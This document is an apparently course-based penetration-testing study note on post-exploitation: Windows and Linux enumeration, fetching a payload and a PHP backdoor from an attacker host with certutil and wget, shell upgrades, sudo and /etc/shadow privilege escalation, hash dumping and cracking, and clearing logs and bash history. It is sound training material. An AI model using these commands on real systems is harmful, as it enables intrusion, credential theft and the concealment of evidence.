# 2.5 Post-Exploitation

## Post-Exploitation

> **⚡ Prerequisites**
>
> * Basic familiarity with Linux & Windows
> * Basic understanding of TCP & UDP protocols
> * Basic familiarity with Metasploit and Exploitation
>
> **📕 Learning Objectives**
>
> * Perform **post exploitation**
> * Perform Win/Linux **local enumeration**
> * Upgrade **shells** and **elevate privileges**
> * Establish **persistence** and **dump** account **hashes**
> * **Pivot** to other systems and **clear** tracks
>
> **🔬 Training list - PentesterAcademy/INE Labs**`subscription required`
>
> * ​[Linux Privilege Escalation](https://www.attackdefense.com/listing?labtype=linux-security-priv-esc\&subtype=linux-security-priv-esc-basic)​
> * ​[Windows Privilege Escalation](https://www.attackdefense.com/listing?labtype=windows-priv-esc\&subtype=windows-priv-esc-basic)​
> * ​[Linux Pivoting](https://www.attackdefense.com/listing?labtype=linux-security-pivoting\&subtype=linux-security-pivoting-getting-started)​
> * ​[Linux Persistence](https://www.attackdefense.com/listing?labtype=linux-security-maintain-access\&subtype=linux-security-maintain-access-getting-started)​
> * ​[Windows Persistence](https://www.attackdefense.com/listing?labtype=windows-maintaining-access\&subtype=windows-maintaining-access-basics)​

### ​[Post-Exploitation](http://www.pentest-standard.org/index.php/Post_Exploitation) Introduction <a href="#post-exploitation-introduction" id="post-exploitation-introduction"></a>

🗒️ **Post-Exploitation** is the final phase of interaction with a target during a pentest. Using various attacking techniques, the pentester determines the value of the compromised system and keeps control of it for future usage, depending on the kind of access and the stealthiness he must have.It is *what the pentester does after the initial foothold* and the techniques depends on the target characteristics (operating system, infrastructure).

* The techniques must follow the ***Rules of Engagement*** agreed upon with the client **before the penetration test**, based on the company infrastructure and services.

> ❗**Necessary permissions are required to conduct post-exploitation techniques like modifying services, system configuration, logs deletion, perform privilege escalation.**

#### Methodology <a href="#methodology" id="methodology"></a>

1. Local Enumeration
2. Transferring Files
3. Upgrading Shells
4. Privilege Escalation
5. Persistence
6. Dumping & Cracking Hashes
7. Pivoting
8. Clearing Tracks

*The post-exploitation process repeats itself after pivoting to another new target.*

> 🔬 The following techniques are covered in the
>
> * 🪟 [Windows Post-Exploitation Labs](https://blog.syselement.com/ine/courses/ejpt/hostnetwork-penetration-testing/5-post-exploit/win-post-exp)​
> * 🐧 [Linux Post-Exploitation Labs](https://blog.syselement.com/ine/courses/ejpt/hostnetwork-penetration-testing/5-post-exploit/linux-post-exp)​

### Windows Local Enumeration <a href="#windows-local-enumeration" id="windows-local-enumeration"></a>

> 📝📌 [Checklist - Local Windows Privilege Escalation | HackTricks](https://book.hacktricks.xyz/windows-hardening/checklist-windows-privilege-escalation)​🔬 [Windows Post-Exploitation Lab](https://blog.syselement.com/ine/courses/ejpt/hostnetwork-penetration-testing/5-post-exploit/win-post-exp)​

#### System Information <a href="#system-information" id="system-information"></a>

*What is running on the target system?*

* Hostname
* OS Name, Build, Service Pack, Architecture
* Installed updates/Hotfixes

```bash
# MSF Meterpreter
getuid
sysinfo
show_mount
cat C:\\Windows\\System32\\eula.txt
getprivs
pgrep explorer.exe
migrate <PROCESS_ID>

# Win CMD - run 'shell' in Meterpreter
# System
hostname
systeminfo
wmic qfe get Caption,Description,HotFixID,InstalledOn #enumerate a list of installed updates in addition to the HotFix URL.
```

#### Users & Groups <a href="#users-and-groups" id="users-and-groups"></a>

* Current user, privileges & additional user information (user's psw policy, age, expiration)
* Other users
* Groups
* Members of the built-in administrators group

F.e. if one user is in the admin group, we can try to exploit it to give admin permissions.

```bash
## Users
whoami
whoami /priv #to see our priviliges
query user #to check if user is logged and prevent detection
net users #display accounts of the system
net user <USER> #display info about account (psw age, expiration, logon hours allowed)
net localgroup #display list of system localgroups (administrators, Remote Desktop Users, Users)
net localgroup Administrators
net localgroup "Remote Desktop Users"
```

#### Network information & Services <a href="#network-information-and-services" id="network-information-and-services"></a>

* IP address & network adapter
* Internal networks and other hosts on the network
* TCP/UDP services + ports
* Routing table
* Windows Firewall state
* Running processes & services
* Scheduled tasks

```bash
## Network
ipconfig
ipconfig /all
route print #display route table
arp -a #display arp table (it's important to see external devices to do pivoting)
netstat -ano #list of open connections and services running (protocol, process, ip/port source, ip/port destination, state, pid)
netsh firewall show state
netsh advfirewall show allprofiles
```

A **process** is an istance of a running program.A **service** is a process that runs in the background.

```bash
## Services
ps
net start
wmic service list brief
tasklist /SVC
schtasks /query /fo LIST
schtasks /query /fo LIST /v
```

#### Automating Local Enumeration <a href="#automating-local-enumeration" id="automating-local-enumeration"></a>

The Local Enumeration process can be automated with the help of scripts and Metasploit Framework modules.

* Be time efficient
* Additional enumeration & exploitation information

```bash
# Metasploit
use post/windows/gather/enum_logged_on_users
use post/windows/gather/win_privs
use post/windows/gather/enum_logged_on_users
use post/windows/gather/checkvm
use post/windows/gather/enum_applications
use post/windows/gather/enum_computers
use post/windows/gather/enum_patches
use post/windows/gather/enum_shares
```

**Tools**:

* ​[JAWS - Just Another Windows (Enum) Script](https://github.com/411Hall/JAWS)​
* ​[winPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS)

```bash
# JAWS - Automatic Local Enumeration - Powershell
powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename Jaws-Enum.txt​
```

### Linux Local Enumeration <a href="#linux-local-enumeration" id="linux-local-enumeration"></a>

> 📝📌 [Checklist - Linux Privilege Escalation | HackTricks](https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist)​🔬 [Linux Post-Exploitation Lab](https://blog.syselement.com/ine/courses/ejpt/hostnetwork-penetration-testing/5-post-exploit/linux-post-exp)​

#### System Information <a href="#system-information-1" id="system-information-1"></a>

* Hostname
* Distribution & release version
* Kernel version & Architecture
* CPU information
* Disk & mounted drives
* Installed packages

```bash
# MSF Meterpreter
getuid #uid = 0 => root
sysinfo
ifconfig
netstat
route
arp
ps
pgrep vsftpd

# Linux SHELL - run 'shell' in Meterpreter
## System
/bin/bash -i
cd /root
hostname
cat /etc/*issue
cat /etc/*release
uname -a
dpkg -l

env
lscpu
free -h
df -h
lsblk | grep sd
```

#### Users & Groups <a href="#users-and-groups-1" id="users-and-groups-1"></a>

* Current user & privileges
* Other users
* Groups

```bash
## Users
whoami
ls -lah /home
cat /etc/passwd #users and services accounts
cat /etc/passwd | grep -v /nologin #users accounts
cat /etc/passwd | grep -v /nologin | cut -d ":" -f 1 #users accounts (only names)
groups <USER>
groups root
groups
who
w
last
lastlog
```

#### Network information & Services <a href="#network-information-and-services-1" id="network-information-and-services-1"></a>

* IP address & network adapter
* Internal networks and other hosts on the network
* TCP/UDP services + ports
* Running services
* Scheduled Cron Jobs

```bash
## Network
ifconfig
ip -br -c a
ip a
cat /etc/networks
cat /etc/hostname
cat /etc/hosts
cat /etc/resolv.conf
arp -a
netstat -a #shows all listening ports and established connections.
netstat -at or netstat -au #can also be used to list TCP or UDP protocols respectively.
netstat -l #list ports in “listening” mode. These ports are open and ready to accept
#incoming connections. This can be used with the “t” option to list only ports that
#are listening using the TCP protocol.
netstat -s #list network usage statistics by protocol. #This can also be used
#with the -t or -u options to limit the output to a specific protocol.
netstat -tp #list connections with the service name and PID information.
#This can also be used with the -l option to list listening ports.
netstat -i #shows interface statistics. We see below that “eth0” and “tun0” are more active than “tun1”.
netstat -ano #which could be broken down as follows: #-a: Display all sockets; n: Do not resolve names; o: Display timers

## Services
ps
ps aux
ps aux | grep msfconsole
ps aux | grep root
top
cat /etc/cron*
crontab -l
```

#### Find command <a href="#automating-local-enumeration-1" id="automating-local-enumeration-1"></a>

Searching the target system for important information and potential privilege escalation vectors can be fruitful. The built-in “find” command is useful and worth keeping in your arsenal.

Below are some useful examples for the “find” command.

**Find files:**

* `find . -name flag1.txt`: find the file named “flag1.txt” in the current directory
* `find /home -name flag1.txt`: find the file names “flag1.txt” in the /home directory
* `find / -type d -name config`: find the directory named config under “/”
* `find / -type f -perm 0777`: find files with the 777 permissions (files readable, writable, and executable by all users)
* `find / -perm a=x`: find executable files
* `find /home -user frank`: find all files for user “frank” under “/home”
* `find / -mtime 10`: find files that were modified in the last 10 days
* `find / -atime 10`: find files that were accessed in the last 10 day
* `find / -cmin -60`: find files changed within the last hour (60 minutes)
* `find / -amin -60`: find files accesses within the last hour (60 minutes)
* `find / -size 50M`: find files with a 50 MB size

This command can also be used with (+) and (-) signs to specify a file that is larger or smaller than the given size.

The example above returns files that are larger than 100 MB. It is important to note that the “find” command tends to generate errors which sometimes makes the output hard to read. This is why it would be wise to use the “find” command with “-type f 2>/dev/null” to redirect errors to “/dev/null” and have a cleaner output.

**Folders and files that can be written to or executed from:**

* `find / -writable -type d 2>/dev/null` : Find world-writeable folders
* `find / -perm -222 -type d 2>/dev/null`: Find world-writeable folders
* `find / -perm -o w -type d 2>/dev/null`: Find world-writeable folders

The reason we see three different “find” commands that could potentially lead to the same result can be seen in the manual document. As you can see below, the perm parameter affects the way “find” works.

* `find / -perm -o x -type d 2>/dev/null` : Find world-executable folders

**Find development tools and supported languages:**

* `find / -name perl*`
* `find / -name python*`
* `find / -name gcc*`

**Find specific file permissions:**

Below is a short example used to find files that have the SUID bit set. The SUID bit allows the file to run with the privilege level of the account that owns it, rather than the account which runs it.

This allows for an interesting privilege escalation path,we will see in more details on task 6.

The example below is given to complete the subject on the “find” command.

* `find / -perm -u=s -type f 2>/dev/null`: Find files with the SUID bit, which allows us to run the file with a higher privilege level than the current user.

#### Automating Local Enumeration <a href="#automating-local-enumeration-1" id="automating-local-enumeration-1"></a>

The Local Enumeration process can be automated with the help of scripts and Metasploit Framework modules. It is very useful to be time efficient.**Tools**:

* ​[LinEnum - rebootuser](https://github.com/rebootuser/LinEnum)​
* ​[linPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS)

```bash
# Metasploit
use post/linux/gather/enum_configs
use post/linux/gather/enum_network
use post/linux/gather/enum_system
use post/linux/gather/checkvm

# LINENUM - Automatic Enumeration
cd /tmp
upload LinEnum.sh
shell
/bin/bash -i
chmod +x LinEnum.sh
./LinEnum.sh

./LinEnum.sh -s -k <keyword> -r <report> -e /tmp/ -t
```

### Transferring Files <a href="#transferring-files" id="transferring-files"></a>

#### ​[Python Web Server](https://developer.mozilla.org/en-US/docs/Learn/Common_questions/Tools_and_setup/set_up_a_local_testing_server)​ <a href="#python-web-server" id="python-web-server"></a>

**`Python`** modules can be useful for setting up a web server that hosts the files required for transfer. These modules

* Check `Python` version

python -Vpython3 -Vpy -v # on Windows

* ​[**`SimpleHTTPServer`**](https://docs.python.org/2.7/library/simplehttpserver.html#module-SimpleHTTPServer) - `python2` module

\# If Python version returned is 2.Xpython -m SimpleHTTPServer \<PORT\_NUMBER>

* ​[**`http.server`**](https://docs.python.org/3/library/http.server.html) - `python3` module

\# If Python version is 3.Xpython3 -m http.server \<PORT># On Windows, trypython -m http.server \<PORT>py -3 -m http.server \<PORT>**`e.g.`**

* Copy a file into the current directory and setup the web server to download the file into the target system

cp /usr/share/windows-resources/mimikatz/x64/mimikatz.exe .​# Python 2.7python -m SimpleHTTPServer 80​# Python 3.7python3 -m http.server 80

* Files can be downloaded from a browser or using a `GET` request

<figure><img src="https://2946054920-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-9fda9e6cda6af72c652286651e6ce3dbd0958793%2Fimage-20230428215801961.png?alt=media" alt=""><figcaption></figcaption></figure>

#### Transferring Files <a href="#transferring-files-1" id="transferring-files-1"></a>

**Windows**

* Set up a web server to host the `payload.exe` file

\# Attacker machinecd /root/Desktop/ # payload.exe must be herepython3 -m http.server 80

* After gaining access to the Windows target system and spawned a command shell session, download the payload file on the target system using the `certutil` tool in `cmd`.

\# Windows Target machinecd C:\Tempcertutil -urlcache -f http\://\<ATTACKER-IP>/payload.exe payload.exe

**Linux**

* After exploiting the Linux target, transfer the `php-backdoor.php` file to the target.
* 2 terminal sessions are necessary - use `tmux` utility to get more sessions.

​[**`tmux`**](https://github.com/tmux/tmux/wiki) - *is a program, **terminal multiplexer**, which runs in a terminal and allows multiple other terminal programs to be run inside it*sudo apt install tmux -y# Attacker machinetmux# ... Exploitation with MSFconsole in Terminal 0 ...# CTRL+B and then C to open a new terminal session​cd /usr/share/webshells/php/ip -br -c a192.219.50.2python3 -m http.server 80# CTRL+B then 0 (zero) to navigate to the first Terminal session# Target machine/bin/bash -iwget <http://192.219.50.2/php-backdoor.phpwget> http\://\<ATTACKER\_IP>/php-backdoor.php

<figure><img src="https://2946054920-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-3881bc1a643bbd134eba3dcaeed1b07ea5383ec9%2Fimage-20230428232055646.png?alt=media" alt=""><figcaption></figcaption></figure>

### Interactive Shells <a href="#interactive-shells" id="interactive-shells"></a>

> 🔬 Interactive shells techniques are covered in an INE vulnerable Lab. Commands are below, assuming the target SAMBA service is already exploited through the `exploit/linux/samba/is_known_pipename` MSF module.

* After the exploitation (using `MSFconsole`, `netcat`, etc), a **non-interactive shell** is obtained since it doesn't provide with a prompt
  * This is a command shell session

Non-interactive Shell

<figure><img src="https://2946054920-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-6779d49a717c21e3f41b609b3f42d87afae5543e%2Fimage-20230428234859491.png?alt=media" alt=""><figcaption></figcaption></figure>

* Display the list of **shells** on the target system

cat /etc/shells# /etc/shells: valid login shells/bin/sh/bin/dash/bin/bash/bin/rbash​/bin/bash -i​/bin/sh -i

<figure><img src="https://2946054920-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-1437180395d983df1ebed08f7894baa3b9ef8623%2Fimage-20230428234334800.png?alt=media" alt=""><figcaption></figcaption></figure>

#### Spawn [TTY Shells](https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/full-ttys#spawn-shells)​ <a href="#spawn-tty-shells" id="spawn-tty-shells"></a>

**Bash**

* Upgrade to a simple **`bash`** or **`sh`** session (assuming `bash` is installed on the target system)

/bin/bash -i/bin/sh -iSHELL=/bin/bash script -q /dev/null​# Setup environment variablesexport PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binexport TERM=xtermexport SHELL=/bin/bash

**​**[**Python**](https://docs.python.org/3/library/pty.html)**​**

* From the non-interactive shell session, check `Python` version (if present)

python --versionPython 2.7.9

* Spawn a **`bash`** session with `Python`. Specified shell must be listed inside `/etc/shells`

python -c 'import pty; pty.spawn("/bin/bash")'**Fully Interactive TTY**

* Background (`CTRL+Z`) the current remote shell
* Update the local terminal line settings with [`stty`](https://man7.org/linux/man-pages/man1/stty.1.html) and bring the remote shell back with `fg`

stty raw -echo && fg

* Reinitialize the terminal with `reset`

reset

> 📌 For more information on **Full TTY Shells** check
>
> * ​[Full TTY Shells - HackTricks](https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/full-ttys)​
> * ​[Upgrade to Fully Interactive TTYs - 0xffsec](https://0xffsec.com/handbook/shells/full-tty/)​

**Perl**

perl -h

* Spawn a **`bash`** session with `Perl`.

perl -e 'exec "/bin/bash";'

### Windows Privilege Escalation <a href="#windows-privilege-escalation" id="windows-privilege-escalation"></a>

**Privilege Escalation vulnerabilities** can be identified by using various automation scripts and tools, based on the target system configuration.

* ​[PrivescCheck](https://github.com/itm4n/PrivescCheck) - *a PowerShell script to enumerate common Windows configuration issues that can be leveraged for local privilege escalation*

#### Running PrivescCheck.ps1 script from Powershell prompt

```bash
Commands: powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck
powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended -Report PrivescCheck_%COMPUTERNAME% -Format TXT,CSV,HTML,XML"
```

We can see result and check clear-text psw in the section winlogon.

Then, we can use psexec.py script to access by ssh:&#x20;

```bash
 psexec.py username@IP #after this, write psw
```

And enumerate info using:

```bash
whoami
net user
whoami /priv
```

in alternative, we can use credentials using msf module:&#x20;

```bash
exploit/windows/smb/psexec #using smb protocol
```

The foundamental is obtains win credential, after that, we can use: SMB, RDP and WinRM for Windows Authentication.

> 🔬 Check
>
> * ​[Windows Privesc Lab](https://blog.syselement.com/ine/courses/ejpt/hostnetwork-penetration-testing/5-post-exploit/win-privesc)​
> * ​[Win Post Exploitation - Metasploit](https://blog.syselement.com/ine/courses/ejpt/hostnetwork-penetration-testing/3-metasploit/win-post-msf)​

### Linux Privilege Escalation <a href="#linux-privilege-escalation" id="linux-privilege-escalation"></a>

Privesc vulnerabilities can be identified automatically using the [LinEnum](https://github.com/rebootuser/LinEnum) tool.

* The below labs will focus on **manual** Linux Privilege Escalation techniques, instead
* Linux file Permissions are important

> 🔬 Check
>
> * ​[Linux Privesc Labs](https://blog.syselement.com/ine/courses/ejpt/hostnetwork-penetration-testing/5-post-exploit/linux-privesc)​
> * ​[Linux Post Exploitation - Metasploit](https://blog.syselement.com/ine/courses/ejpt/hostnetwork-penetration-testing/3-metasploit/linux-post-msf)

The following command will look for files (and not symlinks etc) which is world writable.&#x20;

```bash
find / -not -type l -perm -o+w
find / -user root -perm -4000 -exec ls -ldb {} \; #or this
```

if we don't find nothing of anomaly, we can try to find misconfigured sudo. Check the current sudo capabilities.

```bash
sudo -l
(root) NOPASSWD: /usr/bin/man #user has root permissions for man app
```

The man entry depicts that the man command can be run using sudo without providing any password. Run it and launch /bin/bash from it.

```bash
sudo man ls
!/bin/bash
```

After this, escalated to root user is successful.

if file /etc/shadow is world writable, we can read its contents.

```bash
ls -l /etc/shadow
cat /etc/shadow
```

If root password isn't set. We can adding a known password in shadow file, one can escalate to root. Use openssl to generate a password entry.&#x20;

```bash
openssl passwd -1 -salt abc password #setting new psw
```

Copy the generate entry and add it to root record in /etc/shadow Command:

```bash
vim /etc/shadow #copy psw and save it.
su #insert psw
```

### Windows [Persistence](https://attack.mitre.org/tactics/TA0003/)​ <a href="#windows-persistence" id="windows-persistence"></a>

🗒️ [**Persistence**](https://attack.mitre.org/tactics/TA0003/) *consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access.* - MITRE ATT\&CK

> ❗ **Persistence techniques and methods usually require administrative access and must follow the rules of engagement agree with the customer.**

Persistence Techniques - MITRE ATT\&CK

<figure><img src="https://2946054920-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-e1c96da6aca06c8dfa53800abbbb690af27ac2e6%2Fimage-20230429130516537.png?alt=media" alt=""><figcaption></figcaption></figure>

> 🔬 Check the [Windows Persistence Labs](https://blog.syselement.com/ine/courses/ejpt/hostnetwork-penetration-testing/5-post-exploit/win-persistence)​

### Linux Persistence <a href="#linux-persistence" id="linux-persistence"></a>

Linux Server **`SSH`** service is typically enabled and an attacker can take advantage of it.

* If password login is disabled and ***key-based authentication*** is enabled, t*he attacker can copy a user's `SSH` private key and use it for future access.*

Linux **`Cron`** is a service that repeatedly runs **Cron jobs** that can be used for command execution at a fixed interval and ensure persistent access to the target system.

> 🔬 Check the [Linux Persistence Labs](https://blog.syselement.com/ine/courses/ejpt/hostnetwork-penetration-testing/5-post-exploit/linux-persistence)​

### Dumping & Cracking Hashes <a href="#dumping-and-cracking-hashes" id="dumping-and-cracking-hashes"></a>

📝 Check the already covered Credential Dumping theory here:

* ​[Windows Credential Dumping](https://blog.syselement.com/ine/courses/ejpt/hostnetwork-penetration-testing/1-system-attack/windows-attacks#windows-credential-dumping)​
* ​[Linux Credential Dumping](https://blog.syselement.com/ine/courses/ejpt/hostnetwork-penetration-testing/1-system-attack/linux-attacks#linux-credential-dumping)​

After the dumping process, hashes can be cracked using:

* ​[John The Ripper](https://github.com/openwall/john) - [Cheatsheet​](https://app.gitbook.com/s/iS3hadq7jVFgSa8k5wRA/practical-ethical-hacker-notes/tools/john-the-ripper)
* ​[Hashcat](https://hashcat.net/hashcat/) - [Cheatsheet](https://app.gitbook.com/s/iS3hadq7jVFgSa8k5wRA/practical-ethical-hacker-notes/tools/hashcat)

The best thing to do in privilege escalation optical is migration of **lsass** process, because at difference between explorer.exe, it permits to upgrade sessions at 64 bit and access to lsass process cache.

After migration to lsass process, we can use utility as hashdump.

It will display a dump list of accounts and their hashes (usually NTLM hashes).

Of course, we can store it a file hashes.txt.

We can also load kiwi module, that's a module implementation of Mimikats for Meterpreter.

Now, using tools how **John The Ripper**, we can crack NTLM Hashes.

```bash
john --list=formats | grep NT
john --format=NT hashes.txt If we don't specify word list, John will use default word list, but we can use custom word list as rockyou.
gzip -d /usr/share/wordlists/rockyou.txt.gz
john --format=NT hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
```

​In alternative we can use hashcat.&#x20;

```bash
hashcat --elp
hashcat -a 3 -m 1000 hashes.txt --wordlist /usr/share/wordlists/rockyou.txt #-a 3 (attack-mode brute-force), -m 1000 (NTLM)
```

When we gaining credentials, we can use psex python script, msf module or RDP (default port 3389) by xfreerdp.&#x20;

```bash
xfreerdp /u:user /p:psw /v:IP
```

It's a very good method to access and maintaining legitimate persistence.

> 🔬 Check the [Cracking Hashes Labs here](https://blog.syselement.com/ine/courses/ejpt/hostnetwork-penetration-testing/5-post-exploit/crack-hashes)​

### ​[Pivoting](https://www.offsec.com/metasploit-unleashed/pivoting/)​ <a href="#pivoting" id="pivoting"></a>

🗒️ **Pivoting** is a post exploitation technique of using a compromised host, a **`foothold`** / **`plant`**, to attack other systems on its private internal network.

* Once gained access to the first target host, a forwarded port can be used to exploit other hosts on a private network unreachable from the attacker machine.

🗒️ **Port Forwarding** consists of rerouting/redirecting traffic from a target system's particular port to an attacker system's specific port.

* The service will be remotely available to the attacker system

> 🔬 Check the [Pivoting Lab here](https://blog.syselement.com/ine/courses/ejpt/hostnetwork-penetration-testing/5-post-exploit/pivoting)​

### Clearing Tracks <a href="#clearing-tracks" id="clearing-tracks"></a>

According to the rules of engagement, the pentester may be required to **clear any changes** that have been made to the target systems as a result of the exploitation and post-exploitation stages.A good practice is to store all artifacts payloads, scripts and binaries in these folders:

* Windows - **`C:\Temp`**
* Linux - **`/tmp`**

Metasploit Framework generates and stores a lot of artifacts on the target. *Some modules provides removal resource scripts.*

#### Windows <a href="#windows-1" id="windows-1"></a>

* Delete the **Windows Event Log** can be a good post-exploitation clearing technique.
  * ❗ **Avoid it during a regular Penetration Test, because data inside the Win Event Log is important to the customer.**

**`Metasploit e.g.`**&#x63;d C:\\\mkdir Tempcd Temp# Upload exploit into this C:\Temp directory

<figure><img src="https://2946054920-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-4a332647caa029d9ee70456e0de5acc408711ab7%2Fimage-20230429183522876.png?alt=media" alt=""><figcaption></figcaption></figure>

* Use the `Cleanup RC File`

\# Cleanup Meterpreter RC File:cat /root/.msf4/logs/persistence/ATTACKDEFENSE\_20230429.0454/ATTACKDEFENSE\_20230429.0454.rcbackgroundsessions 1resource /root/.msf4/logs/persistence/ATTACKDEFENSE\_20230429.1019/ATTACKDEFENSE\_20230429.1019.rc# Clear Windows Event Log from the Meterpreter session# An attacker could potentially do thisclearev

<figure><img src="https://2946054920-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-dbfadbd978e871ba9dc1af7b8a3a0d582d16bd54%2Fimage-20230429183629443.png?alt=media" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2946054920-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-210a9d31c6f4cd147fc0bff5522b5ffe68afe312%2Fimage-20230429184104150.png?alt=media" alt=""><figcaption></figcaption></figure>

#### Linux <a href="#linux-1" id="linux-1"></a>

cd /tmp# Upload exploit into this /tmp directory

* `bash` history logs the activity and the used commands
* To clear the **`bash history`**

history -c

<figure><img src="https://2946054920-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-22e04c5eab9e6db54007153ef7a42e845d407108%2Fimage-20230429184656889.png?alt=media" alt=""><figcaption></figcaption></figure>

* **`~/.bash_history`** file content can be deleted too

cat /dev/null > \~/.bash\_history

<figure><img src="https://2946054920-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-37a413a434fe4238e22aab604932449af90f750c%2Fimage-20230429184831730.png?alt=media" alt=""><figcaption></figcaption></figure>

* When using **Metasploit Framework** exploits, proceed manually to clear artifacts from the `/tmp` directory or other used directories.